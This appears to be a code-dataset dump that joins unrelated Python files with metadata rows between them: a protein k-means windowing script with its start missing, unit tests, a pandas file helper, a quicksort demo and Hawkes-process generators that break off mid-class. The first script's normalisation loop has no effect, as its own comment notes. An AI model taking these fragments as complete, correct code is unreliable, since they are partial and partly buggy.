def find(s, ch):
    """Return every index at which character `ch` occurs in string `s`."""
    positions = []
    for index, letter in enumerate(s):
        if letter == ch:
            positions.append(index)
    return positions
# DATALOAD
# Command-line versions of the parameters (currently disabled in favour of
# the hard-coded values below):
#user_input = str(sys.argv[1])
#ranking = str(sys.argv[2])
#working = str(sys.argv[3])
#iterations = int(sys.argv[4])
#trys = int(sys.argv[5])
user_input = "D:/Proseeker/exampledeets.csv"  # sequence + site-list CSV
ranking = "D:/Proseeker/ranking.csv"  # per-amino-acid value table
working = "D:/Proseeker"  # output directory
iterations = 1000000  # KMeans max_iter
trys = 1000  # KMeans n_init
# Table with one column per amino-acid one-letter code; the loop below
# assumes 544 rows.
aavals = pd.read_csv(ranking, usecols=['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V'],
                     sep =',')
d = {}
# NOTE(review): DataFrame.replace returns a new frame and the result is
# discarded here, so this min-max normalisation loop has no effect on
# `aavals` -- it likely needs `aavals = aavals.replace(...)` or
# `inplace=True`.  TODO confirm the intended behaviour.
for i in range(0,544):
    for j in range(0,20):
        rowmin = min(aavals.iloc[i])
        rowmax = max(aavals.iloc[i])
        val = aavals.iloc[i, j]
        aavals.replace([aavals.iloc[i, j]], (val - rowmin)/(rowmax - rowmin))
# Per-residue value-vector lookup, keyed by one-letter amino-acid code.
d['A'] = list(aavals['A'])
d['R'] = list(aavals['R'])
d['D'] = list(aavals['D'])
d['N'] = list(aavals['N'])
d['C'] = list(aavals['C'])
d['E'] = list(aavals['E'])
d['Q'] = list(aavals['Q'])
d['G'] = list(aavals['G'])
d['H'] = list(aavals['H'])
d['I'] = list(aavals['I'])
d['L'] = list(aavals['L'])
d['K'] = list(aavals['K'])
d['M'] = list(aavals['M'])
d['F'] = list(aavals['F'])
d['P'] = list(aavals['P'])
d['S'] = list(aavals['S'])
d['T'] = list(aavals['T'])
d['W'] = list(aavals['W'])
d['Y'] = list(aavals['Y'])
d['V'] = list(aavals['V'])
# Input library: column 0 = sequence, column 1 = colon-separated site list.
library = pd.read_csv(user_input, header=None, sep=',')
seqs = library[0]
sites = library[1]
# PROCESSING
# For every sequence: replace residues by their value vectors, then for
# every listed site cluster a 13-residue window and write it to CSV.
for x in range(0, len(seqs)):
    # Duplicate the residue list so windows can index past the end.
    residues = list(seqs[x])
    subject = residues + residues
    # Swap each one-letter residue code (either case) for its value vector
    # from `d`; characters without an entry are left untouched, exactly as
    # the original per-letter branch chain behaved.
    for z in range(0, len(subject)):
        code = subject[z].upper()
        if code in d:
            subject[z] = d[code]
    site_spec = str(sites[x])
    colon_positions = find(site_spec, ':')
    colon_positions.append(len(site_spec))
    if sum(colon_positions) > 0:
        for q in range(len(colon_positions)):
            # Site numbers are the colon-separated integer fields.
            if q == 0:
                subpos = int(site_spec[0:colon_positions[q]])
            else:
                subpos = int(site_spec[colon_positions[q - 1] + 1:colon_positions[q]])
            # 13-residue window centred on the site (offsets -6 .. +6).
            window_cols = [subject[subpos + offset] for offset in range(-6, 7)]
            breswindow = np.column_stack(window_cols)
            kmeans = KMeans(n_clusters=50, n_init=trys, max_iter=iterations, algorithm="full")
            kmeans.fit(breswindow)
            # Append the cluster label as an extra (14th) column.
            breswindow = np.insert(breswindow, 13, kmeans.labels_, axis=1)
            savetxt(os.path.join(working, 'p{}.bres{}.csv'.format(x + 1, q + 1)),
                    breswindow, delimiter=',', fmt='%f')
| 29.759358 | 120 | 0.4708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 768 | 0.138005 |
444a190a1b95aaf1953da26833ea09f6dfc98b31 | 10,828 | py | Python | Ity/Tools/test_TestResults.py | rmomizo/Ubiqu-Ity | 67bd167c248d6f9e2810df5028b2288a828bdbfc | [
"BSD-2-Clause"
] | 11 | 2015-06-22T15:52:31.000Z | 2021-09-14T18:51:26.000Z | Ity/Tools/test_TestResults.py | rmomizo/Ubiqu-Ity | 67bd167c248d6f9e2810df5028b2288a828bdbfc | [
"BSD-2-Clause"
] | null | null | null | Ity/Tools/test_TestResults.py | rmomizo/Ubiqu-Ity | 67bd167c248d6f9e2810df5028b2288a828bdbfc | [
"BSD-2-Clause"
] | 9 | 2015-05-15T23:06:34.000Z | 2021-09-15T16:05:51.000Z | import copy
from unittest import TestCase
import TestResults
__author__ = 'zthomae'
class TestArgumentParser(TestCase):
    """Behavioural tests for the CLI parser built by TestResults.make_parser().

    Uses unittest's `assertRaises` context manager instead of the original
    hand-rolled try/except/self.fail pattern; pass/fail outcomes are the same.
    """

    def setUp(self):
        self.parser = TestResults.make_parser()

    def test_type_should_not_be_optional(self):
        with self.assertRaises(ValueError,
                               msg='Parser does not fail when a test type is not present'):
            TestResults.parse_args(self.parser, '--input foo --results bar'.split())

    def test_inputs_should_not_be_optional(self):
        with self.assertRaises(ValueError,
                               msg='Parser does not fail when input files are not present'):
            TestResults.parse_args(self.parser, '--type foo --results bar'.split())

    def test_results_should_not_be_optional(self):
        with self.assertRaises(ValueError,
                               msg='Parser does not fail when results files are not present'):
            TestResults.parse_args(self.parser, '--type foo --input bar'.split())

    def test_only_one_type_allowed(self):
        # argparse exits the interpreter on a parse error.
        # TODO: Wrap argparse behavior
        with self.assertRaises(SystemExit,
                               msg='Parser accepts more than one test type'):
            TestResults.parse_args(self.parser, '--type two words --input foo --results bar'.split())

    def test_should_expect_at_least_one_input_file(self):
        with self.assertRaises(SystemExit,
                               msg='Parser accepts zero input files'):
            TestResults.parse_args(self.parser, '--type foo --input --results bar'.split())

    def test_should_expect_at_least_one_results_file(self):
        with self.assertRaises(SystemExit,
                               msg='Parser accepts zero results files'):
            TestResults.parse_args(self.parser, '--type foo --input bar --results'.split())

    def test_should_allow_more_than_one_input_file(self):
        # Inverse case: multiple input files must NOT trigger a parse error.
        try:
            TestResults.parse_args(self.parser, '--type foo --input these files --results bar'.split())
        except SystemExit:
            self.fail("Parser doesn't accept multiple input files")

    def test_should_allow_more_than_one_results_file(self):
        try:
            TestResults.parse_args(self.parser, '--type foo --input file --results these files'.split())
        except SystemExit:
            self.fail("Parser doesn't accept multiple results files")
class TestInputFileParser(TestCase):
    """Tests for TestResults.parse_input_files().

    Uses unittest assertion methods instead of the original
    `if <cond>: self.fail(...)` pattern; pass/fail outcomes are the same.
    """

    def setUp(self):
        # Mix of absolute, relative, bare, and parent-relative paths.
        self.input_files = ['/foo/bar/Text1.txt', 'bar/baz/Text2.txt', 'Text3.txt', '../Text4.txt']
        self.results = TestResults.parse_input_files(self.input_files)

    def test_should_use_basename(self):
        self.assertEqual(
            sorted(self.results.keys()),
            sorted(['Text1.txt', 'Text2.txt', 'Text3.txt', 'Text4.txt']),
            'parse_input_files should return a dictionary with input file basenames as keys')

    def test_should_return_fullpaths(self):
        for entry in self.results.values():
            self.assertIn('fullpath', entry,
                          'parse_input_files should return fullpaths to input files')
class TestDocuscopeResultsParser(TestCase):
    """Tests for TestResults.parse_docuscope_results().

    Uses unittest assertion methods instead of the original
    `if <cond>: self.fail(...)` pattern; pass/fail outcomes are the same.
    """

    def setUp(self):
        # Well-formed results split across one or two "files".
        self.ds_results_file = ''.join([
            '<AnnotatedText File="Text1.txt" Group="foo" />',
            '<AnnotatedText File="Text2.txt" Group="foo" />',
            '<AnnotatedText File="Text3.txt" Group="bar" />'
        ])
        self.ds_results_file_2 = ''.join([
            '<AnnotatedText File="Text4.txt" Group="foo" />',
            '<AnnotatedText File="Text5.txt" Group="bar" />'
        ])
        # Entries in the wrong element must be ignored.
        self.ds_wrong_tag_results_file = ''.join([
            '<Text File="Text1.txt" Group="foo" />',
            '<Text File="Text2.txt" Group="foo" />',
            '<AnnotatedText File="Text3.txt" Group="foo" />'
        ])
        # Entries missing the File attribute must be ignored.
        self.ds_wrong_attr_results_file = ''.join([
            '<AnnotatedText Fil="Text1.txt" Group="foo" />',
            '<AnnotatedText File="Text2.txt" Group="foo" />',
        ])

    def test_should_handle_one_file(self):
        results = TestResults.parse_docuscope_results([self.ds_results_file])
        for name in ('Text1.txt', 'Text2.txt', 'Text3.txt'):
            self.assertIn(name, results,
                          "parse_docuscope_results didn't add expected files for one input file")

    def test_should_handle_multiples_files(self):
        results = TestResults.parse_docuscope_results([self.ds_results_file, self.ds_results_file_2])
        for name in ('Text1.txt', 'Text2.txt', 'Text3.txt', 'Text4.txt', 'Text5.txt'):
            self.assertIn(name, results,
                          "parse_docuscope_results didn't add expected files for multiple input files")

    def test_should_not_add_files_in_wrong_element(self):
        results = TestResults.parse_docuscope_results([self.ds_wrong_tag_results_file])
        self.assertLessEqual(len(results.keys()), 1,
                             'parse_docuscope_results added files not in AnnotatedText elements')

    def test_should_do_nothing_if_missing_file_attribute(self):
        results = TestResults.parse_docuscope_results([self.ds_wrong_attr_results_file])
        # TODO: Bad test
        self.assertEqual(len(results.keys()), 1,
                         "parse_docuscope_results didn't add files correctly")

    def test_should_add_present_status(self):
        results = TestResults.parse_docuscope_results([self.ds_results_file])
        for entry in results.values():
            self.assertIn('present', entry,
                          'parse_docuscope_results should add "present" key')

    def test_should_add_text(self):
        results = TestResults.parse_docuscope_results([self.ds_results_file])
        # TODO: This test doesn't check as much as it should
        for entry in results.values():
            self.assertIn('text', entry,
                          'parse_docuscope_results should add "text" key')
class TestMatchFiles(TestCase):
    """match_files should mark results entries present without mutating either argument."""
    def setUp(self):
        self.results_files = {
            name: {'text': '', 'present': False}
            for name in ('Text1.txt', 'Text2.txt', 'Text3.txt')
        }
    def test_should_copy_results(self):
        if TestResults.match_files([], self.results_files) != self.results_files:
            self.fail('match_files should return results_files if input_files empty')
    def test_should_set_file_true_if_in_inputs(self):
        files = TestResults.match_files(['Text1.txt'], self.results_files)
        if files['Text1.txt']['present'] is not True:
            self.fail('match_files should set entries to True if present in input_files')
    def test_should_keep_file_false_if_not_in_inputs(self):
        files = TestResults.match_files(['Text1.txt'], self.results_files)
        still_false = (
            files['Text2.txt']['present'] is False
            and files['Text3.txt']['present'] is False
        )
        if not still_false:
            self.fail('match_files should keep entries set to False if not present in input_files')
    def test_should_not_change_input_files(self):
        input_files = ['Text1.txt']
        snapshot = copy.copy(input_files)
        TestResults.match_files(input_files, self.results_files)
        if input_files != snapshot:
            self.fail('match_files should not change input_files')
    def test_should_not_change_results_files(self):
        snapshot = copy.copy(self.results_files)
        TestResults.match_files(['Text1.txt'], self.results_files)
        if self.results_files != snapshot:
            self.fail('match_files should not change results_files')
class TestComputeTestPairs(TestCase):
    """compute_test_pairs should pair 'present' job texts with formatted input files."""
    @staticmethod
    def format(text):
        """Identity formatter used as the formatting callback."""
        return text
    def setUp(self):
        self.job = {
            'Text1.txt': {'text': 'first', 'present': True},
            'Text2.txt': {'text': 'second', 'present': False},
            'Text3.txt': {'text': 'third', 'present': True}
        }
        self.input_files = {
            'Text1.txt': {'fullpath': '/Text1.txt', 'text': ''},
            'Text2.txt': {'fullpath': '/Text2.txt', 'text': ''},
            'Text3.txt': {'fullpath': '/Text3.txt', 'text': ''},
        }
        self.results = TestResults.compute_test_pairs(self.job, self.input_files, self.format)
    def test_should_throw_valueerror_if_too_few_input_files(self):
        trimmed = copy.copy(self.input_files)
        del trimmed['Text3.txt']
        try:
            TestResults.compute_test_pairs(self.job, trimmed, self.format)
        except ValueError:
            return
        self.fail('compute_test_pairs should throw ValueError if an input file is not in input_files')
    def test_should_not_include_not_present_job_files(self):
        if 'Text2.txt' in self.results:
            self.fail('compute_test_pairs should not include texts if they are not "present" in the job')
    def test_should_not_check_if_non_present_input_files_are_missing(self):
        trimmed = copy.copy(self.input_files)
        del trimmed['Text2.txt']
        try:
            TestResults.compute_test_pairs(self.job, trimmed, self.format)
        except ValueError:
            self.fail("compute_test_pairs shouldn't throw ValueError if non-present job file is not in input_files")
    def test_should_return_names(self):
        if any('name' not in pair for pair in self.results.values()):
            self.fail('compute_test_pairs should return text names')
    def test_should_return_ground_truths(self):
        for text, pair in self.results.items():
            if pair['ground_truth'] != self.job[text]['text']:
                self.fail('compute_test_pairs should return ground_truth text')
    def test_should_return_formatted_input_file(self):
        if any('test_input' not in pair for pair in self.results.values()):
            self.fail('compute_test_pairs should return test_input')
class TestCompareTestPairs(TestCase):
    """compare_test_pairs should attach a 'results' entry to every test pair."""
    @staticmethod
    def compare(t1, t2):
        """Stub comparison callback; returns an empty result dict."""
        return {}
    def setUp(self):
        self.test_pairs = {
            'Text1.txt': {
                'name': 'Text1.txt',
                'ground_truth': 'foo',
                'test_input': 'foo'
            },
            'Text2.txt': {
                'name': 'Text2.txt',
                'ground_truth': 'foo',
                'test_input': 'bar'
            }
        }
        self.results = TestResults.compare_test_pairs(self.test_pairs, self.compare)
    def test_should_return_results_for_each_pair(self):
        has_results = (
            'results' in self.results['Text1.txt']
            and 'results' in self.results['Text2.txt']
        )
        if not has_results:
            self.fail('compare_test_pairs should return results for each of the test pairs')
    # TODO: Test more thoroughly
444a5ccfe65d81015051a623aa67855a8610e6c7 | 2,105 | py | Python | 01-datamodeling/project02-data-modeling-with-cassandra/file_mgr.py | ultranet1/DATA-ENGINEERING-NANODEGREE-UDACITY | d04e39e7312f04307f12257157c19ea40da2f11a | [
"Apache-2.0"
] | 33 | 2020-09-01T20:10:28.000Z | 2022-02-11T06:15:55.000Z | 01-datamodeling/project02-data-modeling-with-cassandra/file_mgr.py | ultranet1/DATA-ENGINEERING-NANODEGREE-UDACITY | d04e39e7312f04307f12257157c19ea40da2f11a | [
"Apache-2.0"
] | null | null | null | 01-datamodeling/project02-data-modeling-with-cassandra/file_mgr.py | ultranet1/DATA-ENGINEERING-NANODEGREE-UDACITY | d04e39e7312f04307f12257157c19ea40da2f11a | [
"Apache-2.0"
] | 64 | 2021-01-21T11:55:34.000Z | 2022-03-10T08:14:11.000Z |
import os
import glob
import pandas as pd
class FileMgr:
    """
    Manage I/O files and directories and transform files to pandas
    dataframes and vice versa.
    """
    @staticmethod
    def get_directory_files_list(directory_path: str):
        """
        Recursively collect the paths of all files under a directory.

        Bug fix: the original reassigned the list on every os.walk
        iteration, so only the last visited directory's glob was
        returned. Paths are now accumulated across all directories,
        and only real files (not subdirectories) are listed, matching
        the documented contract.

        :param directory_path: path/to/directory.
        :return: list with the paths of every file under directory_path.
        """
        file_path_list = []
        for root, _dirs, files in os.walk(directory_path):
            file_path_list.extend(
                os.path.join(root, file_name) for file_name in files
            )
        return file_path_list
    @staticmethod
    def file_num_rows(file_path: str) -> int:
        """
        Count the number of rows of a file.
        :param file_path: path/to/file.
        :return: number of lines of the file.
        """
        with open(file_path, 'r', encoding='utf8') as f:
            return sum(1 for line in f)
    @staticmethod
    def read_file_to_pd(file_path: str, schema):
        """
        Read a CSV file into a pandas dataframe with a determined schema.
        :param file_path: path/to/file.
        :param schema: mapping of column name -> dtype to cast each column.
        :return: pandas dataframe.
        """
        df = pd.read_csv(file_path)
        for k, v in schema.items():
            df[k] = df[k].astype(v)
        return df
    @staticmethod
    def files_to_pd(file_path_list):
        """
        Read all the CSV files in a list and concatenate them into one
        pandas dataframe.
        Note: pd.concat raises ValueError when file_path_list is empty,
        unchanged from the original behavior.
        :param file_path_list: list of file paths.
        :return: pandas dataframe with the rows of all the files.
        """
        li = [
            pd.read_csv(filename, index_col=None, header=0)
            for filename in file_path_list
        ]
        return pd.concat(li, axis=0, ignore_index=True)
    @staticmethod
    def pd_to_file(file_path, df):
        """
        Write a pandas dataframe to a csv file.
        :param file_path: path/to/csv/file.
        :param df: pandas dataframe.
        """
        df.to_csv(file_path, sep=',', encoding='utf-8', header=1, index=False)
| 28.066667 | 92 | 0.59715 | 2,059 | 0.978147 | 0 | 0 | 1,906 | 0.905463 | 0 | 0 | 1,008 | 0.47886 |
444d912fa3629eb0be4d59d69c09ce050796a70c | 879 | py | Python | Day-111/quick_sort.py | arvimal/100DaysofCode-Python | 01e59f45b4dc06a3be9e9900456a6bd439752911 | [
"MIT"
] | 1 | 2020-06-15T05:59:01.000Z | 2020-06-15T05:59:01.000Z | Day-111/quick_sort.py | arvimal/100DaysofCode-Python | 01e59f45b4dc06a3be9e9900456a6bd439752911 | [
"MIT"
] | null | null | null | Day-111/quick_sort.py | arvimal/100DaysofCode-Python | 01e59f45b4dc06a3be9e9900456a6bd439752911 | [
"MIT"
] | 7 | 2020-01-24T23:03:58.000Z | 2021-05-31T01:00:27.000Z | #!/usr/bin/env python3
# Algorithm: Quick sort
# Reference: https://github.com/TheAlgorithms/Python/blob/master/sorts/quick_sort.py
def quick_sort(num_list):
    """
    Sort a list of numbers with the quicksort algorithm.

    Fixes over the original implementation:
    - elements equal to the pivot are no longer silently dropped
      (the old code kept only strictly-smaller and strictly-greater
      values, so quick_sort([2, 2, 1]) returned [1, 2]);
    - the input list is no longer mutated (the old code consumed the
      pivot with list.pop).

    :param num_list: list of mutually comparable values.
    :return: a new sorted list; num_list is left untouched.
    """
    # lists of length 0 or 1 are already sorted; return a copy so the
    # caller's list is never aliased or mutated
    if len(num_list) <= 1:
        return list(num_list)
    pivot = num_list[-1]
    less_than = [num for num in num_list if num < pivot]
    equal_to = [num for num in num_list if num == pivot]
    greater_than = [num for num in num_list if num > pivot]
    return quick_sort(less_than) + equal_to + quick_sort(greater_than)
# Demo: sort a sample list of mixed positive/negative numbers and print it.
num_list = [10, -1, 100, 23, 5, 98, 45, 76, -545, -300, 9999]
print(quick_sort(num_list))
| 25.114286 | 85 | 0.606371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 351 | 0.399317 |
444e975a0c4fb13e72c462d983b88bade759c75d | 141,070 | py | Python | modules/sequence_generators.py | ZhaozhiQIAN/neurawkes | 1a3caa837b34f77ac9d078bc9bf10ff10a3bf959 | [
"MIT"
] | null | null | null | modules/sequence_generators.py | ZhaozhiQIAN/neurawkes | 1a3caa837b34f77ac9d078bc9bf10ff10a3bf959 | [
"MIT"
] | null | null | null | modules/sequence_generators.py | ZhaozhiQIAN/neurawkes | 1a3caa837b34f77ac9d078bc9bf10ff10a3bf959 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Here are the sequence generators
including LSTM generator and Hawkes generator
@author: hongyuan
"""
import pickle
import time
import numpy
import theano
from theano import sandbox
import theano.tensor as tensor
import os
#import scipy.io
from collections import defaultdict
from theano.tensor.shared_randomstreams import RandomStreams
import utils
import struct
dtype=theano.config.floatX
class HawkesGen(object):
    '''
    Sequence generator that samples event streams from a multivariate
    (purely exciting) Hawkes process via the thinning algorithm.
    '''
    def __init__(self, settings):
        '''
        we follow the definition of multivariate Hawkes process:
        mu is the base intensity,
        alpha is the effect (excitation) matrix and
        delta is the decay matrix.
        Parameters are sampled randomly, or loaded from the pickle at
        settings['path_pre_train'] when that entry is not None.
        '''
        self.args = settings['args']
        self.sum_for_time = settings['sum_for_time']
        # seed the RNG so generated corpora are reproducible
        numpy.random.seed(
            settings['seed_random']
        )
        print("initializing ... ")
        if settings['path_pre_train'] == None:
            self.dim_process = settings['dim_process']
            # base intensity, one entry per event type
            self.mu = numpy.float32(
                numpy.random.uniform(
                    low=0.0, high=1.0,
                    size=(self.dim_process,)
                )
            )
            # alpha[k, k'] : excitation of type k caused by a past event of type k'
            self.alpha = numpy.float32(
                numpy.random.uniform(
                    low=10.0, high=20.0,
                    size=(self.dim_process, self.dim_process)
                )
            )
            # delta[k, k'] : exponential decay rate of that excitation
            self.delta = numpy.float32(
                numpy.random.uniform(
                    low=10.0, high=20.0,
                    size=(self.dim_process, self.dim_process)
                )
            )
        else:
            path_pre_train = os.path.abspath(
                settings['path_pre_train']
            )
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.mu = model_pre_train['mu']
            self.alpha = model_pre_train['alpha']
            self.delta = model_pre_train['delta']
        #self.intensity = numpy.copy(self.mu)
        self.name = 'HawkesGen'
        #
        self.intensity = numpy.copy(self.mu)
        self.one_seq = []
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq))
        print("done ")
    #
    #
    def set_params(self):
        '''
        Overwrite mu/alpha/delta with the fixed 4-type parameters used
        for the missing-data experiments.
        '''
        print("set the params for missing data experiments ... ")
        self.dim_process = numpy.int32(4)
        self.mu = numpy.float32(
            numpy.ones((self.dim_process, ))
        )
        self.alpha = numpy.float32(
            numpy.array(
                [
                    [0.0, 1.0, 0.0, 0.0],
                    [0.0, 0.0, 1.0, 0.0],
                    [0.0, 0.0, 0.0, 0.0],
                    [0.0, 0.0, 0.0, 0.0]
                ]
            )
        )
        self.delta = numpy.float32(
            numpy.array(
                [
                    [1.0, 1.0, 1.0, 1.0],
                    [1.0, 1.0, 1.0, 1.0],
                    [1.0, 1.0, 1.0, 1.0],
                    [1.0, 1.0, 1.0, 1.0]
                ]
            )
        )
    #
    def set_args(self, dict_args):
        '''Attach the run-configuration dict to this generator.'''
        self.args = dict_args
    #
    #
    def save_model(self, file_save):
        '''Pickle the process parameters and metadata to file_save.'''
        print("saving model of generator ... ")
        model_dict = {
            'mu': numpy.copy(self.mu),
            'alpha': numpy.copy(self.alpha),
            'delta': numpy.copy(self.delta),
            'dim_process': self.dim_process,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        '''Clear the event memory and reset the starting time to 0.'''
        self.intensity = numpy.copy(self.mu)
        self.one_seq = []
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    #
    #
    def compute_intensity_given_past(self, time_current):
        '''
        Recompute self.intensity at time_current given all events
        currently stored in self.one_seq.
        '''
        # initialize with mu; we do not need to check whether
        # time_current exceeds the sequence since it is automatically
        # guaranteed by how this method is called
        self.intensity = numpy.copy(self.mu)
        for event in self.one_seq:
            time_since_start = event['time_since_start']
            #if time_current > time_since_start:
            # if this event is counted as * past event *
            type_event = event['type_event']
            change_time = time_current - time_since_start
            decay_frac = numpy.exp(
                -self.delta[:, type_event] * change_time
            )
            # self.intensity += self.alpha[:, idx_to_occur]
            self.intensity += numpy.copy(
                self.alpha[:, type_event] * decay_frac
            )
        # intensity computation is finished
    #
    #
    #
    # we can try using another method to sample data, which is quicker:
    # first sample a point with rate \sum \lambda
    # and then sample the type based on the \lambda_k
    #
    def sample_time_given_type(self, type_event):
        '''
        Thinning algorithm: sample the time of the next event of one
        given type (the little k in the paper formulation).
        '''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        self.compute_intensity_given_past(time_current)
        intensity_hazard = numpy.copy(
            self.intensity[type_event]
        )
        #
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / self.intensity[type_event]
            # the line below implements adaptive thinning: it speeds
            # things up by decreasing the upper bound each iteration
            # (valid because the pure-excitation intensity decays
            # between events)
            intensity_hazard = numpy.copy(
                self.intensity[type_event]
            )
        #
        return time_current
    #
    #
    #
    def sample_time_for_all_type(self):
        '''
        Thinning algorithm on the total rate: sample the time of the
        next event regardless of its type.
        '''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        self.compute_intensity_given_past(time_current)
        intensity_hazard = numpy.sum(self.intensity)
        #
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / numpy.sum(self.intensity)
            # adaptive thinning: decrease the upper bound each
            # iteration to speed up acceptance
            intensity_hazard = numpy.sum(self.intensity)
        #
        return time_current
    #
    #
    #
    def sample_one_event_sep(self):
        '''
        Sample one event per type separately and keep the earliest
        (Liniger-style competing risks).
        '''
        time_of_happen = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for type_event in range(self.dim_process):
            # sample one event using "thinning algorithm"
            time_of_happen[type_event] = numpy.copy(
                self.sample_time_given_type(
                    type_event
                )
            )
        #
        time_since_start_new = numpy.min(time_of_happen)
        type_event_new = numpy.argmin(time_of_happen)
        return time_since_start_new, type_event_new
    #
    #
    def sample_one_event_tog(self):
        '''
        Sample the next event time from the total rate, then draw its
        type proportionally to the per-type intensities at that time.
        '''
        time_since_start_new = self.sample_time_for_all_type()
        self.compute_intensity_given_past(
            time_since_start_new
        )
        prob = self.intensity / numpy.sum(self.intensity)
        type_event_new = numpy.random.choice(
            range(self.dim_process), p = prob
        )
        return time_since_start_new, numpy.int32(type_event_new)
    #
    #
    def sample_one_event(self):
        '''Dispatch to the joint or per-type sampler per settings.'''
        if self.sum_for_time:
            return self.sample_one_event_tog()
        else:
            return self.sample_one_event_sep()
    #
    #
    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of max_len events, restarting the state.
        Liniger (2009), p. 28, describes the "thinning algorithm":
        generate one event of each type, take the minimum, and discard
        the others. max_len is a pre-sampled value that fixes the
        length of the sequence.
        '''
        self.restart_sequence()
        # initialize the seq
        time_since_start = numpy.float32(0.0)
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        #
        for idx_event in range(max_len):
            time_since_start_new, type_event_new = self.sample_one_event()
            self.cnt_total_event += 1
            #
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
            #
        #
    #
    #
    #
    def gen_seqs(self, settings):
        '''
        Generate settings['num_seqs'] sequences, each with a length
        sampled uniformly from [min_len, max_len]; store them in
        self.list_seqs.
        '''
        #print(settings)
        num_seqs = settings['num_seqs']
        #
        self.list_seqs = []
        cnt_seqs = 0
        #for idx_seq in range(num_seqs):
        while cnt_seqs < num_seqs:
            #
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            #
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
        #
    #
    def print_some(self):
        '''Pretty-print the first 10 generated sequences for inspection.'''
        print("printing some seqs ... ")
        for idx_seq in range(10):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = []
            list_time = []
            list_dtime = []
            list_items = []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
                list_dtime.append(
                    round(event_item['time_since_last_event'], 4)
                )
                list_items.append(
                    (
                        event_item['type_event'],
                        round(
                            event_item['time_since_last_event'], 4
                        )
                    )
                )
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)
    #
    #
    def save_seqs(self, file_save):
        '''Pickle the list of generated sequences to file_save.'''
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class HawkesInhibGen(object):
    '''
    Sequence generator using a Hawkes process with inhibition:
    alpha may be negative, and the raw (tilde) intensity is passed
    through a softplus to stay positive.
    '''
    def __init__(self, settings):
        '''
        we follow the definition of multivariate Hawkes process:
        mu is the base intensity,
        alpha is the effect matrix (may be negative -> inhibition) and
        delta is the decay matrix.
        Parameters are sampled randomly, or loaded from the pickle at
        settings['path_pre_train'] when that entry is not None.
        '''
        print("initializing ... ")
        self.args = settings['args']
        self.sum_for_time = settings['sum_for_time']
        # seed the RNG so generated corpora are reproducible
        numpy.random.seed(
            settings['seed_random']
        )
        if settings['path_pre_train'] == None:
            self.dim_process = settings['dim_process']
            self.mu = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (self.dim_process,)
                )
            )
            self.alpha = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (self.dim_process, self.dim_process)
                )
            )
            self.delta = numpy.float32(
                numpy.random.uniform(
                    low=10.0, high=20.0,
                    size=(self.dim_process, self.dim_process)
                )
            )
        else:
            path_pre_train = os.path.abspath(
                settings['path_pre_train']
            )
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.mu = model_pre_train['mu']
            self.alpha = model_pre_train['alpha']
            self.delta = model_pre_train['delta']
        #self.intensity = numpy.copy(self.mu)
        self.name = 'HawkesInhibGen'
        #
        # intensity_tilde is the pre-softplus ("raw") intensity;
        # intensity = softplus(intensity_tilde) is what gets sampled from
        self.intensity_tilde = numpy.copy(self.mu)
        self.intensity = numpy.log(
            numpy.float32(1.0) + numpy.exp(
                self.intensity_tilde
            )
        )
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq))
        print("done ")
    #
    #
    #
    #
    def set_args(self, dict_args):
        '''Attach the run-configuration dict to this generator.'''
        self.args = dict_args
    #
    #
    def soft_relu(self, x):
        '''Softplus log(1 + exp(x)); keeps the intensity positive.'''
        return numpy.log(numpy.float32(1.0)+numpy.exp(x))
    #
    def hard_relu(self, x):
        '''ReLU max(x, 0), written as (x + |x|) / 2.'''
        return numpy.float32(0.5) * (x + numpy.abs(x) )
    #
    #
